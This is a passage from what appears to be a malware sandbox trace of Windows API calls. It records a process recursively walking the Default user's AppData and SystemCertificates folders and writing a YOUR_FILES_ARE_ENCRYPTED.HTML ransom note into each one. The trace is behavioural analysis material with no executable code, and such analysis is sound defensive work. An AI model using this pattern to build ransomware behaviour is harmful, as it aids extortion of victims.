ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.161] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.161] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="My", cAlternateFileName="")) returned 1 [0171.162] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 68 [0171.162] GetProcessHeap () returned 0x270000 [0171.162] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0171.162] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0171.162] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0171.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0171.162] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.162] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0171.162] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 81 [0171.162] GetProcessHeap () returned 0x270000 [0171.162] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0171.162] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0171.163] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0171.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0171.163] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.163] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.163] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0171.163] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0171.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0171.164] WriteFile (in: hFile=0x5dc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0171.167] CloseHandle (hObject=0x5dc) returned 1 [0171.167] GetProcessHeap () returned 0x270000 [0171.168] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0171.168] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CRLs", cAlternateFileName="")) returned 1 [0171.168] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 73 [0171.168] GetProcessHeap () returned 0x270000 [0171.168] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0171.168] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0171.168] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0171.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0171.169] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.169] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.169] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0171.169] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0171.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0171.170] WriteFile (in: hFile=0x5dc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0171.172] CloseHandle (hObject=0x5dc) returned 1 [0171.172] GetProcessHeap () returned 0x270000 [0171.173] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0171.173] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CTLs", cAlternateFileName="")) returned 1 [0171.173] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 73 [0171.173] GetProcessHeap () returned 0x270000 [0171.173] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0171.173] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0171.173] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0171.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0171.174] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.174] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.174] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0171.174] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0171.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0171.175] WriteFile (in: hFile=0x5dc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0171.178] CloseHandle (hObject=0x5dc) returned 1 [0171.179] GetProcessHeap () returned 0x270000 [0171.180] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0171.180] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CTLs", cAlternateFileName="")) returned 0 [0171.180] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0171.180] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0171.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0171.181] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0171.184] CloseHandle (hObject=0x58c) returned 1 [0171.184] GetProcessHeap () returned 0x270000 [0171.185] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0171.185] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="My", cAlternateFileName="")) returned 0 [0171.186] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.186] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0171.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.187] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.190] CloseHandle (hObject=0x5fc) returned 1 [0171.191] GetProcessHeap () returned 0x270000 [0171.191] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.192] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89642899, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 1 [0171.192] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89642899, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 0 [0171.192] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0171.192] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0171.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600 [0171.193] WriteFile (in: hFile=0x600, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0171.196] CloseHandle (hObject=0x600) returned 1 [0171.197] GetProcessHeap () returned 0x270000 [0171.197] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0171.204] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0171.204] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.204] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0171.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.206] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.209] CloseHandle (hObject=0x5f8) returned 1 [0171.209] GetProcessHeap () returned 0x270000 [0171.210] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.211] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="")) returned 0 [0171.212] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.212] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0171.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.213] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.216] CloseHandle 